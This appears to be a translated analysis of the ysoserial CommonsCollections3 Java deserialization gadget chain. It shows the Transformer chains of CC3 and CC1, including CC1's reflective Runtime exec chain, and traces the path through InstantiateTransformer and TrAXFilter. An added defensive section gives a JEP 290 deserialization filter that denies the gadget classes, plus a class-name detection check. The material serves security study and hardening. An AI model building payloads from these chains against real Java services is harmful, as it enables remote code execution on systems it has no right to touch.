ysoserial CC3: Java deserialization
1. Starting from the entry point
1) CC3 is a combination of CC1 and CC2
2) The Transformer chain is as follows; it uses the TrAXFilter class
    final Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(TrAXFilter.class),
        new InstantiateTransformer(
            new Class[] { Templates.class },
            new Object[] { templatesImpl } )};
3) As in CC1, the trigger ends up in LazyMap's get method
4) which calls Object value = this.factory.transform(key);
Comparison with CC1
CC1 instantiates InvokerTransformer objects to perform the reflective calls
    final Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] {
            String.class, Class[].class }, new Object[] {
            "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] {
            Object.class, Object[].class }, new Object[] {
            null, new Object[0] }),
        new InvokerTransformer("exec",
            new Class[] { String.class }, execArgs),
        new ConstantTransformer(1) };
CC3 does not use the InvokerTransformer class; here it uses the TrAXFilter and InstantiateTransformer classes instead
    final Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(TrAXFilter.class),
        new InstantiateTransformer(
            new Class[] { Templates.class },
            new Object[] { templatesImpl } )};
InstantiateTransformer's transform method looks up the constructor and then instantiates the class
    public Object transform(Object input) {
        try {
            if (!(input instanceof Class)) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
            } else {
                Constructor con = ((Class)input).getConstructor(this.iParamTypes); // look up the matching public constructor
                return con.newInstance(this.iArgs); // instantiate the class; in CC3 this runs the TrAXFilter constructor, which assigns _transformer
            }
        } catch (NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException ex) {
            // catch blocks abbreviated from the decompiled source: each case is rethrown as a FunctorException
            throw new FunctorException("InstantiateTransformer: constructor lookup or invocation failed", ex);
        }
    }
The TrAXFilter class
Key line: _transformer = (TransformerImpl) templates.newTransformer();
This reaches the TransformerImpl class; from here on the call sequence is the same as in CC2
    public TrAXFilter(Templates templates) throws
        TransformerConfigurationException
    {
        _templates = templates;
        _transformer = (TransformerImpl) templates.newTransformer();
        _transformerHandler = new TransformerHandlerImpl(_transformer);
        _useServicesMechanism = _transformer.useServicesMechnism();
    }
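The analysis above shows the chain is nothing more than a sequence of ordinary class instantiations, so the practical control is to refuse those classes at deserialization time. The following is an added example (not ysoserial code and not part of this write-up) of a Java 9+ ObjectInputFilter (JEP 290) that rejects the CC1/CC3 entry classes (LazyMap and the commons-collections functors) and the CC2/CC3 sink package (TrAXFilter, TemplatesImpl and TransformerImpl all live in com.sun.org.apache.xalan.internal.xsltc.trax), then allows only an explicit application package; the com.example.app package and the size limits are assumptions. It also includes a cheap pre-check for logging, which relies on the fact that Java serialization writes class names as plain UTF strings in the stream.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.nio.charset.StandardCharsets;

/** Added example: deserialization hardening against the CC3 chain (not ysoserial code). */
public final class Cc3HardenedInput {

    // JEP 290 pattern filter. The first matching pattern decides, so denies come first,
    // then resource limits, then a narrow allow-list and a final deny-all.
    // com.example.app.** is an assumed application package; adjust to your own.
    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            // CC1/CC3 entry: LazyMap.get -> factory.transform(key) over the functors
            "!org.apache.commons.collections.map.LazyMap;"
          + "!org.apache.commons.collections.functors.**;"
            // CC2/CC3 sink: TrAXFilter, TemplatesImpl, TransformerImpl
          + "!com.sun.org.apache.xalan.internal.xsltc.trax.**;"
            // assumed limits against deeply nested or oversized graphs
          + "maxdepth=20;maxrefs=1000;maxbytes=65536;"
          + "com.example.app.**;java.lang.*;java.util.*;!*");

    /**
     * Deserializes untrusted bytes under the filter. A rejected class (or an exceeded
     * limit) makes readObject throw java.io.InvalidClassException before any
     * constructor or readObject method of the rejected class can run.
     */
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    /**
     * Detection aid for logging or alerting only; the filter above is the actual control.
     * Class descriptors in a serialized stream carry the fully qualified class name as
     * modified UTF-8, so the CC3 class names are visible as plain ASCII substrings.
     */
    public static boolean mentionsCc3Gadget(byte[] data) {
        String s = new String(data, StandardCharsets.ISO_8859_1);
        return s.contains("org.apache.commons.collections.functors.InstantiateTransformer")
            || s.contains("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter")
            || s.contains("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
    }
}
```

Call readFiltered wherever the application currently calls ObjectInputStream.readObject on data from the network; a process-wide default can be set instead with the jdk.serialFilter system property using the same pattern string. The deny patterns only cover the classes named in this write-up, so the final !* deny-all is what actually closes the door on other gadget chains; keep the allow-list as small as the application permits.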